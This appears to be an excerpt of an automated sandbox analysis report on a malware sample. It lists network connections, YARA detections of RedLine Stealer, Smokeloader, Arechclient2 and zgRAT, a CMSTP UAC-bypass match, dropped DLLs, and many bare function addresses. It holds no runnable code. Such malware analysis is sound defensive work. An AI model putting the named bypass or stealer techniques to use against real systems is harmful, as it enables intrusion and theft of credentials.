Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749

Source: unknown	HTTPS traffic detected: 169.150.236.98:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49761 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe

Code function: 2_2_008DC8B0 GetClientRect,GetDC,CreateCompatibleBitmap,GetDC,CreateCompatibleDC,BitBlt,

2_2_008DC8B0

System Summary

Malicious sample detected (through community Yara rule)

Source: 16.2.cmd.exe.4c74e64.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 16.2.cmd.exe.4c30976.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.run.exe.3044d5b.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 13.2.run.exe.300086d.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 16.2.cmd.exe.52100c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 3.2.cmd.exe.52f2264.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 2.2.run.exe.421986d.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 2.2.run.exe.425d15b.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.MSBuild.exe.700000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 16.2.cmd.exe.4c74264.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 16.2.cmd.exe.52100c8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 13.2.run.exe.304415b.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.cmd.exe.5d600c8.8.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 3.2.cmd.exe.5d600c8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 3.2.cmd.exe.52f2e64.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 2.2.run.exe.425dd5b.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.cmd.exe.52ae976.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.14811e96ca8.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd4432f.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd1d525.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487fd68739.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487ca04dad.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487c9f47a3.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 15.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.1487c9e537d.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000000.00000002.1965167409.00000000008EF000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000001.00000002.2073537008.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000001.00000002.2073633195.0000000002F37000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: C:\Users\user\AppData\Local\Temp\qbji, type: DROPPED	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\phtshfcnnluilu, type: DROPPED	Matched rule: Detects Arechclient2 RAT Author: ditekSHen

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe

Code function: 1_2_6BD862C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,

1_2_6BD862C0

Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_00427880	0_2_00427880
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_0040B8AE	0_2_0040B8AE
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_0040C191	0_2_0040C191
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_004051B4	0_2_004051B4
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_004123A0	0_2_004123A0
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_0040F441	0_2_0040F441
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_0040C44C	0_2_0040C44C
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_0042140C	0_2_0042140C
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_0040BC20	0_2_0040BC20
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_0041BE39	0_2_0041BE39
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_0040BECA	0_2_0040BECA
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_00408761	0_2_00408761
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_0041B722	0_2_0041B722
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_0040C7FC	0_2_0040C7FC
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_024ECA63	0_2_024ECA63
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_024EBB15	0_2_024EBB15
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_024EC3F8	0_2_024EC3F8
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_024EC131	0_2_024EC131
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_024E89C8	0_2_024E89C8
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_024FB989	0_2_024FB989
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_024F2607	0_2_024F2607
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_024EBE87	0_2_024EBE87
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_024EF6A8	0_2_024EF6A8
Source: C:\Users\user\Desktop\R0hb7jyBcv.exe	Code function: 0_2_024EC6B3	0_2_024EC6B3
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD06BE0	1_2_6BD06BE0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCA0BA0	1_2_6BCA0BA0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC7EA80	1_2_6BC7EA80
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC7CA70	1_2_6BC7CA70
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCAEA00	1_2_6BCAEA00
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCB8A30	1_2_6BCB8A30
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD1C9E0	1_2_6BD1C9E0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC349F0	1_2_6BC349F0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC909A0	1_2_6BC909A0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCBA9A0	1_2_6BCBA9A0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCC09B0	1_2_6BCC09B0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC38960	1_2_6BC38960
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC56900	1_2_6BC56900
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD068E0	1_2_6BD068E0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCD4840	1_2_6BCD4840
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC50820	1_2_6BC50820
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC8A820	1_2_6BC8A820
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC00FE0	1_2_6BC00FE0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCDEFF0	1_2_6BCDEFF0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD48FB0	1_2_6BD48FB0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC0EFB0	1_2_6BC0EFB0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC6EF40	1_2_6BC6EF40
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCC2F70	1_2_6BCC2F70
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC06F10	1_2_6BC06F10
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD40F20	1_2_6BD40F20
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC0AEC0	1_2_6BC0AEC0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCA0EC0	1_2_6BCA0EC0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC86E90	1_2_6BC86E90
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC9EE70	1_2_6BC9EE70
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCE0E20	1_2_6BCE0E20
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD8CDC0	1_2_6BD8CDC0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC96D90	1_2_6BC96D90
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC04DB0	1_2_6BC04DB0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD2AD50	1_2_6BD2AD50
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCCED70	1_2_6BCCED70
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD88D20	1_2_6BD88D20
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC5ECD0	1_2_6BC5ECD0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BBFECC0	1_2_6BBFECC0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC0AC60	1_2_6BC0AC60
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCC6C00	1_2_6BCC6C00
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCDAC30	1_2_6BCDAC30
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC543E0	1_2_6BC543E0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC323A0	1_2_6BC323A0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC5E3B0	1_2_6BC5E3B0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC08340	1_2_6BC08340
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD42370	1_2_6BD42370
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC02370	1_2_6BC02370
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD1C360	1_2_6BD1C360
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC96370	1_2_6BC96370
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC72320	1_2_6BC72320
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD862C0	1_2_6BD862C0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCD22A0	1_2_6BCD22A0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCCE2B0	1_2_6BCCE2B0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC98250	1_2_6BC98250
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC88260	1_2_6BC88260
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCCA210	1_2_6BCCA210
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCD8220	1_2_6BCD8220
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC001E0	1_2_6BC001E0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC68140	1_2_6BC68140
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC76130	1_2_6BC76130
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCE4130	1_2_6BCE4130
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BBF8090	1_2_6BBF8090
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC100B0	1_2_6BC100B0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCDC0B0	1_2_6BCDC0B0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC4E070	1_2_6BC4E070
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCCC000	1_2_6BCCC000
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCC8010	1_2_6BCC8010
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC2A7D0	1_2_6BC2A7D0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC80700	1_2_6BC80700
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC246D0	1_2_6BC246D0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC5E6E0	1_2_6BC5E6E0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC9E6E0	1_2_6BC9E6E0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC5C650	1_2_6BC5C650
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BBF45B0	1_2_6BBF45B0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCCA5E0	1_2_6BCCA5E0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC8E5F0	1_2_6BC8E5F0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD48550	1_2_6BD48550
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC58540	1_2_6BC58540
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD04540	1_2_6BD04540
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC62560	1_2_6BC62560
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCA0570	1_2_6BCA0570
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC464D0	1_2_6BC464D0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC9A4D0	1_2_6BC9A4D0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD2A480	1_2_6BD2A480
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC18460	1_2_6BC18460
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC64420	1_2_6BC64420
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC8A430	1_2_6BC8A430
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC47BF0	1_2_6BC47BF0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BBF1B80	1_2_6BBF1B80
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCE5B90	1_2_6BCE5B90
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC59BA0	1_2_6BC59BA0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCC9BB0	1_2_6BCC9BB0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCDFB60	1_2_6BCDFB60
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC4BB20	1_2_6BC4BB20
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC01AE0	1_2_6BC01AE0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCDDAB0	1_2_6BCDDAB0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD89A50	1_2_6BD89A50
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC3FA10	1_2_6BC3FA10
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCA1A10	1_2_6BCA1A10
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCFDA30	1_2_6BCFDA30
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC999C0	1_2_6BC999C0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC399D0	1_2_6BC399D0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC659F0	1_2_6BC659F0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC979F0	1_2_6BC979F0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC11980	1_2_6BC11980
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCD1990	1_2_6BCD1990
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC7F960	1_2_6BC7F960
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCBD960	1_2_6BCBD960
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD4F900	1_2_6BD4F900
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCB5920	1_2_6BCB5920
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC9F8C0	1_2_6BC9F8C0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC0D8E0	1_2_6BC0D8E0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC338E0	1_2_6BC338E0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD5B8F0	1_2_6BD5B8F0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCDF8F0	1_2_6BCDF8F0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC5D810	1_2_6BC5D810
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD1DFC0	1_2_6BD1DFC0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD83FC0	1_2_6BD83FC0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCABFF0	1_2_6BCABFF0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC21F90	1_2_6BC21F90
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BBF5F30	1_2_6BBF5F30
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC35F20	1_2_6BC35F20
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD57F20	1_2_6BD57F20
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC23EC0	1_2_6BC23EC0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD5BE70	1_2_6BD5BE70
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD85E60	1_2_6BD85E60
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD0DE10	1_2_6BD0DE10
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCD1DC0	1_2_6BCD1DC0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BBF3D80	1_2_6BBF3D80
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD49D90	1_2_6BD49D90
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC63D00	1_2_6BC63D00
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD3DCD0	1_2_6BD3DCD0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCC1CE0	1_2_6BCC1CE0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC9FC80	1_2_6BC9FC80
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC03C40	1_2_6BC03C40
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD29C40	1_2_6BD29C40
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC11C30	1_2_6BC11C30
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC753E0	1_2_6BC753E0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC35350	1_2_6BC35350
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCA1350	1_2_6BCA1350
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD89300	1_2_6BD89300
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC052F0	1_2_6BC052F0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCCF2F0	1_2_6BCCF2F0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC0B2B0	1_2_6BC0B2B0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BD35270	1_2_6BD35270
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCC7260	1_2_6BCC7260
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCC5220	1_2_6BCC5220
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC631C0	1_2_6BC631C0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC131E0	1_2_6BC131E0
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BC4F150	1_2_6BC4F150
Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: 1_2_6BCC3120	1_2_6BCC3120
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_008DF840	2_2_008DF840
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_008C4060	2_2_008C4060
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_008C2120	2_2_008C2120
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_008E6130	2_2_008E6130
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_008DB150	2_2_008DB150
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_0090CAA0	2_2_0090CAA0
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_00919A00	2_2_00919A00
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_008D4390	2_2_008D4390
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_008E0390	2_2_008E0390
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_008EFC10	2_2_008EFC10
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_00915550	2_2_00915550
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_009196E0	2_2_009196E0
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_008CA6F0	2_2_008CA6F0
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_008E66F0	2_2_008E66F0
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_008C37B0	2_2_008C37B0
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_6C944D8F	2_2_6C944D8F
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_6C943D16	2_2_6C943D16
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_6C95371C	2_2_6C95371C
Source: C:\Users\user\AppData\Local\Temp\u5g0.2\run.exe	Code function: 2_2_6C8BD24D	2_2_6C8BD24D

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe	Code function: String function: 6BD8DAE0 appears 82 times
